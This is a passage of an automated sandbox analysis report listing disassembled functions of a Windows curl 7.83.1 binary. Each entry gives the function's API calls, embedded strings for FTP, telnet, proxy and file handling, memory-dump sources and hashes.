Instruction Fuzzy Hash: 4EB11331A0469A9FDB359B25DC85BFEB7B9AF84304F1401EAE04973282EB715E85CF50

Function 000CF7FA Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 281stringCOMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000CF866
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,0000000A), ref: 000CF87A
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000CF886
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000CF9A0
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,0000000A), ref: 000CF9AF
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000CF9BB
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000CFA09
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,0000000A), ref: 000CFA18
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000CFA24
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000CFA39
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,0000000A), ref: 000CFA48
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000CFA54

Part of subcall function 000C3857: __stdio_common_vsscanf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,000000FF,?,00000000,?), ref: 000C3872

Strings

%c-%c%c, xrefs: 000CF849

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: _errno$strtoul$__stdio_common_vsscanf
String ID: %c-%c%c
API String ID: 3842623485-1458410868
Opcode ID: cf9710ffbbd19c9e3b875c4c3e2070655cadf0dadadcc71666b8ac18bc75caee
Instruction ID: 43dbd1d61b62a495e849de4a598d10fd5339896daf65399f101dda476ff103b7
Opcode Fuzzy Hash: cf9710ffbbd19c9e3b875c4c3e2070655cadf0dadadcc71666b8ac18bc75caee
Instruction Fuzzy Hash: 57B18AB5A002069FDB15CF68C890BBDBBF6AF89344F24806ED845AB252DB319D45CB52

Function 000E97D8 Relevance: 23.0, APIs: 9, Strings: 4, Instructions: 205stringCOMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,000D5A87), ref: 000E9806
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000D5A87), ref: 000E983D
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000D5A87), ref: 000E985F
___from_strstr_to_strchr.LIBCMT ref: 000E986B
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00125674,00000000,00000002,?,000D5A87), ref: 000E9884
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(../,00000000,00000003), ref: 000E9899
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E99D1

Strings

../, xrefs: 000E9894
/./, xrefs: 000E98B1
/../, xrefs: 000E98EC
/.., xrefs: 000E9918, 000E9929

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free$strncmp$___from_strstr_to_strchrmalloc
String ID: ../$/..$/../$/./
API String ID: 11556461-456519384
Opcode ID: 4f323e1bca2380074005849e646fcffa92d67313ddf29dbf4985c2b508ae1065
Instruction ID: 65dd2790bb96b47023f4073c71de96ec4749e930313749677b71aa520510226a
Opcode Fuzzy Hash: 4f323e1bca2380074005849e646fcffa92d67313ddf29dbf4985c2b508ae1065
Instruction Fuzzy Hash: 50515B21A081D2AFDB351B2E6C54779FFE6DF97350F28406EE4C1B7253DAA14C428751

Function 000FD200 Relevance: 22.9, APIs: 5, Strings: 10, Instructions: 410COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000FD359
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000FD36E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000FD3C0
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000FD405
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000FD58F

Strings

server did not report OK, got %d, xrefs: 000FD5FB
Failure sending ABOR command: %s, xrefs: 000FD469
ABOR, xrefs: 000FD445
control connection looks dead, xrefs: 000FD553
partial download completed, closing connection, xrefs: 000FD5BA
Uploaded unaligned file size (%I64d out of %I64d bytes), xrefs: 000FD696
No data was received, xrefs: 000FD709
Remembering we are in dir "%s", xrefs: 000FD3D0
Exceeded storage allocation, xrefs: 000FD60E
Received only partial file: %I64d bytes, xrefs: 000FD71F

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free
String ID: ABOR$Exceeded storage allocation$Failure sending ABOR command: %s$No data was received$Received only partial file: %I64d bytes$Remembering we are in dir "%s"$Uploaded unaligned file size (%I64d out of %I64d bytes)$control connection looks dead$partial download completed, closing connection$server did not report OK, got %d
API String ID: 1294909896-265991785
Opcode ID: ef7bbf5dd6a2c51dd1bab30b35c059b6cb77ea1e4831db858c574b494df5a015
Instruction ID: 855daa685af7535c6ff859bb2dd5279bb46979848672b2698a4d697040728afc
Opcode Fuzzy Hash: ef7bbf5dd6a2c51dd1bab30b35c059b6cb77ea1e4831db858c574b494df5a015
Instruction Fuzzy Hash: 3FF159305087499FDB69DF34C4887BA7BE3BB51314F04460FEA9886A82D774E844FB92

Function 000FEE2C Relevance: 22.7, APIs: 5, Strings: 10, Instructions: 188stringCOMMON

Download Yara Rule

APIs

Part of subcall function 000D0DCE: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D0E08

strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,0000001F), ref: 000FEF55
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000FF0E0
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000FF0F5

Part of subcall function 000D0E10: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000C3167), ref: 000D0E2C
Part of subcall function 000D0E10: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D0E41

Strings

%127[^= ]%*[ =]%255s, xrefs: 000FEF19
XDISPLOC, xrefs: 000FEF74
%hu%*[xX]%hu, xrefs: 000FF01E
NEW_ENV, xrefs: 000FEFB7
USER,%s, xrefs: 000FEEAE
Unknown telnet option %s, xrefs: 000FF090
Syntax error in telnet option: %s, xrefs: 000FF0A9
TTYPE, xrefs: 000FEF31
1, xrefs: 000FF0B4
BINARY, xrefs: 000FF03D

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free$strncpy
String ID: %127[^= ]%*[ =]%255s$%hu%*[xX]%hu$1$BINARY$NEW_ENV$Syntax error in telnet option: %s$TTYPE$USER,%s$Unknown telnet option %s$XDISPLOC
API String ID: 526250031-1116758244
Opcode ID: 2d57e14f9558c3d7498007267b831d1dd0137dda2fd60c75602f2718a08417ee
Instruction ID: 76eca33857f975b41d397f39137e704c7a5b358923e0b42c5be9a3d31a60e158
Opcode Fuzzy Hash: 2d57e14f9558c3d7498007267b831d1dd0137dda2fd60c75602f2718a08417ee
Instruction Fuzzy Hash: 12718F71904219EBDF20DF14DC81BEA77B9BF44300F1480B6E9499B646DFB09A98DF61

Function 000FC900 Relevance: 21.4, APIs: 5, Strings: 9, Instructions: 363COMMON

Download Yara Rule

Strings

unsupported parameter to CURLOPT_FTPSSLAUTH: %d, xrefs: 000FC9F4
SYST, xrefs: 000FCCD0
AUTH %s, xrefs: 000FCA22, 000FCAAD
Got a %03d ftp-server response when 220 was expected, xrefs: 000FC9B2
ACCT rejected by server: %03d, xrefs: 000FCB0D
Failed to clear the command channel (CCC), xrefs: 000FCBFB
CCC, xrefs: 000FCB97
Entry path is '%s', xrefs: 000FCD0F, 000FCD5E
PROT %c, xrefs: 000FCB3C

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID:
String ID: ACCT rejected by server: %03d$AUTH %s$CCC$Entry path is '%s'$Failed to clear the command channel (CCC)$Got a %03d ftp-server response when 220 was expected$PROT %c$SYST$unsupported parameter to CURLOPT_FTPSSLAUTH: %d
API String ID: 0-499900516
Opcode ID: 941bd267f684d5333cc5a4d1562a396d614d4740f9234d9dfbf26cd6d32cb47f
Instruction ID: e66fd054a91d1e63259796fe34c58aec37115c05dc7419df7f46a8f2e8d44f1c
Opcode Fuzzy Hash: 941bd267f684d5333cc5a4d1562a396d614d4740f9234d9dfbf26cd6d32cb47f
Instruction Fuzzy Hash: 6DC13A70A0111D9FEB24DB28C982FBE77E5AF45304F18407BEA09DB642DB746C41ABD2

Function 000C1580 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 274fileCOMMON

Download Yara Rule

APIs

fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?), ref: 000C15E1
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 000C15F9
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?), ref: 000C1692
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?,?,?), ref: 000C16A0
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?), ref: 000C16AC
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 000C1780
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,?,00000001,?,?,%.*s:,00000000,?), ref: 000C18A3
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000001,?), ref: 000C18B7

Strings

filename=, xrefs: 000C1738
etag:, xrefs: 000C1620
%.*s:, xrefs: 000C1886
Content-disposition:, xrefs: 000C16E4

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: fwrite$fflush$fputcfree
String ID: %.*s:$Content-disposition:$etag:$filename=
API String ID: 697768202-2097661518
Opcode ID: 46f16777fed1cd486835cfa0fef0d30e13f592fa2c0e7f2a9b907d707d22469e
Instruction ID: 9e251eef52513faff952944144c4f217e057fc2f4557f36622bae42dd99e7ba5
Opcode Fuzzy Hash: 46f16777fed1cd486835cfa0fef0d30e13f592fa2c0e7f2a9b907d707d22469e
Instruction Fuzzy Hash: 7CA1C035A04705EBDB25CF64C880FEEBBF2AF42344F18856DE8A657253D730A981DB90

Function 000E40DC Relevance: 21.3, APIs: 10, Strings: 4, Instructions: 272COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E41E7
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E41FD
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E422D
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E4265
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E4291
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E42D5
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E4311
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E43B3
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E4420
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E4432

Strings

Uses proxy env variable %s == '%s', xrefs: 000E41B0
NO_PROXY, xrefs: 000E4196
no_proxy, xrefs: 000E4180
memory shortage, xrefs: 000E4133

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free
String ID: NO_PROXY$Uses proxy env variable %s == '%s'$memory shortage$no_proxy
API String ID: 1294909896-1311824155
Opcode ID: a89c96c1900e9d2b0b5fcfc46fc9c7e7a344c35b7b74036aa9f89eab6c874ba0
Instruction ID: 03735eb7ab1f4bf6f64552adb496dc93ca2121396b84e9973260fc3d73169e4d
Opcode Fuzzy Hash: a89c96c1900e9d2b0b5fcfc46fc9c7e7a344c35b7b74036aa9f89eab6c874ba0
Instruction Fuzzy Hash: 2EA1CE30A04696EFDF589F75D8487AEBBE6FF44310F24806EE418A3251DB74AD50CB91

Function 000C9DC4 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 208COMMON

Download Yara Rule

APIs

_strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 000C9DCF
_strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 000C9E7A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C9F01
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C9F0F
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C9F5B
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000C9F70
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C9F9B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C9FAA
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C9FC5
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C9FD9

Strings

out of memory, xrefs: 000C9E61, 000CA025
k%, xrefs: 000CA038

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free$_strdup
String ID: out of memory$k%
API String ID: 2653869212-351869995
Opcode ID: d4bc3b6eb9f78318b4ef9431b001a6dc5030cc0c4f219359ef38df18d8ec0478
Instruction ID: a6972de48ee5fcf824037d6c1dca998faf26baabfd0482e8c2df1e7e09d2b881
Opcode Fuzzy Hash: d4bc3b6eb9f78318b4ef9431b001a6dc5030cc0c4f219359ef38df18d8ec0478
Instruction Fuzzy Hash: F1812531A01646CFDB58CFA4C888FADBBF2BF54311F28417EE8099F655DB70A8818B54

Function 000C8A54 Relevance: 21.1, APIs: 3, Strings: 9, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 000D20F5: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,?,?,?,000C8A7A,curl 7.83.1 (Windows) %s,00000000), ref: 000D2101

puts.API-MS-WIN-CRT-STDIO-L1-1-0(001174AB), ref: 000C8AC7
qsort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,00000000,00000004,Function_00008A20), ref: 000C8B1A
puts.API-MS-WIN-CRT-STDIO-L1-1-0(001174AB), ref: 000C8B43

Strings

%s, xrefs: 000C8B2D
Release-Date: %s, xrefs: 000C8A7F
Protocols: , xrefs: 000C8A98
%s , xrefs: 000C8AAD
curl 7.83.1 (Windows) %s, xrefs: 000C8A70
2022-05-13, xrefs: 000C8A7A
7.83.1, xrefs: 000C8B52
Features:, xrefs: 000C8AD8
WARNING: curl and libcurl versions do not match. Functionality may be affected., xrefs: 000C8B68

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: puts$__acrt_iob_funcqsort
String ID: %s$%s $2022-05-13$7.83.1$Features:$Protocols: $Release-Date: %s$WARNING: curl and libcurl versions do not match. Functionality may be affected.$curl 7.83.1 (Windows) %s
API String ID: 619265888-3826092985
Opcode ID: c7a0dcc0372ef03d58fb5c54e94b2a8acf19f17dc21291e880afdc7ac52fa567
Instruction ID: 51c98bbd6c096fac8f3c1cc2f9412f05ec2e39ca43b87b77ab05f35ad325c3b7
Opcode Fuzzy Hash: c7a0dcc0372ef03d58fb5c54e94b2a8acf19f17dc21291e880afdc7ac52fa567
Instruction Fuzzy Hash: 2D31E470344300ABC728AF68E846DED3FA5FF48B10764413EF41197683DFB1988297AA

Function 000DA0B8 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 89stringCOMMON

Download Yara Rule

APIs

GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000DA0C3
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA0CB
__sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA0DD
__sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0(000000FF), ref: 000DA0EC
strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 000DA0F6
_strrchr.LIBCMT ref: 000DA142
_strrchr.LIBCMT ref: 000DA15C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA173
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA180
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000DA188
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 000DA193

Strings

Unknown error %d (%#x), xrefs: 000DA125

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: ErrorLast_errno$_strrchr$__sys_errlist__sys_nerrstrncpy
String ID: Unknown error %d (%#x)
API String ID: 3225659327-2414550090
Opcode ID: d1a0669c28c47b2dff1d0bcba0b76cd425710c4b57e4ab27bc20a0e7200624e3
Instruction ID: bca3265a6e963a35fca6c3a2ced2a81e85a46688eaba6418bc1afcf7fb7773f6
Opcode Fuzzy Hash: d1a0669c28c47b2dff1d0bcba0b76cd425710c4b57e4ab27bc20a0e7200624e3
Instruction Fuzzy Hash: 47212835300B11EBC71917B89C097AE7AEA9FD7391F10402BF102D77A2DBB4884086B6

Function 000C35D3 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 89filetimeCOMMON

Download Yara Rule

APIs

_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000C35E5
CreateFileA.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000080,00000007,00000000,00000003,00000000,00000000), ref: 000C35FD
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C360D
GetFileTime.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000,?), ref: 000C3621
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000C3666
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 000C3688
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000C3690
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000C369B

Strings

Failed to get filetime: CreateFile failed: GetLastError %u, xrefs: 000C36A2
Failed to get filetime: underflow, xrefs: 000C3646
Failed to get filetime: GetFileTime failed: GetLastError %u, xrefs: 000C3679

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: ErrorFileLast$CloseCreateHandleTimeUnothrow_t@std@@@__ehfuncinfo$??2@_strdupfree
String ID: Failed to get filetime: CreateFile failed: GetLastError %u$Failed to get filetime: GetFileTime failed: GetLastError %u$Failed to get filetime: underflow
API String ID: 862977939-2112902429
Opcode ID: 2ba0c95d697235a9247c5e2e4bcad23fb2b4b0c68e17ecdccdb4c6a0c49b0bfc
Instruction ID: 4f186120f72e4d0ae0ac04476b9bbd1ed91ba9d1aed3eb1aac08b16a2c4e3d6e
Opcode Fuzzy Hash: 2ba0c95d697235a9247c5e2e4bcad23fb2b4b0c68e17ecdccdb4c6a0c49b0bfc
Instruction Fuzzy Hash: F921C571A14600BBD7196BB49D4EFFE7BA9EB85704F14C12DF502E62C1EB709E404625

Function 000E46F5 Relevance: 19.8, APIs: 9, Strings: 4, Instructions: 272COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E473C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E4755
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E4772
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E479C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E4874
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E48C3
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E48D7
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E48F3
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E495C

Strings

%s%s.netrc, xrefs: 000E4832
%s%s_netrc, xrefs: 000E4885
Couldn't find host %s in the %s file; using defaults, xrefs: 000E4922
HOME, xrefs: 000E4817

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free
String ID: %s%s.netrc$%s%s_netrc$Couldn't find host %s in the %s file; using defaults$HOME
API String ID: 1294909896-3314400472
Opcode ID: a3762b430ff8d6e9f88746810ccbbb490cc28054d4e8c51ddcfba58382103769
Instruction ID: a96ace1989ef94a5ac09a670f69f438cc7a18a68f9a88e010771a72f8813c832
Opcode Fuzzy Hash: a3762b430ff8d6e9f88746810ccbbb490cc28054d4e8c51ddcfba58382103769
Instruction Fuzzy Hash: 79A18D35A0461AEFCB189F65EC44AAEB7F5FF48310F14806BE851B3251EB70AD51CBA1

Function 000E33BC Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 418stringCOMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E346D
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E34FF
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E35A5
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E35E8
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E3637
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,0000000A), ref: 000E381E

Strings

Switched from HTTP to HTTPS due to HSTS => %s, xrefs: 000E3646
file, xrefs: 000E3546, 000E3804
%s://%s, xrefs: 000E3438
http, xrefs: 000E3567
https, xrefs: 000E35B6

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free$strtoul
String ID: %s://%s$Switched from HTTP to HTTPS due to HSTS => %s$file$http$https
API String ID: 961130014-588811053
Opcode ID: eded5ba8aa16cfadcad29d7c20ce4955ef55999e4a1356105081060bb5da2263
Instruction ID: b8ca0dd2aa03f85a76760ba321bdf822b177d2bfa0ced9933d539f664f4f489c
Opcode Fuzzy Hash: eded5ba8aa16cfadcad29d7c20ce4955ef55999e4a1356105081060bb5da2263
Instruction Fuzzy Hash: 16E12371704B42AFEB2C9B35DC44BE9BBE6AF44310F14812BE855A73C1DF70AA448B90

Function 000F7FE8 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 239networkCOMMON

Download Yara Rule

APIs

sendto.WS2_32(?,?,00000004,00000000,?,?), ref: 000F80F9
sendto.WS2_32(?,?,?,00000000,?,?), ref: 000F8193
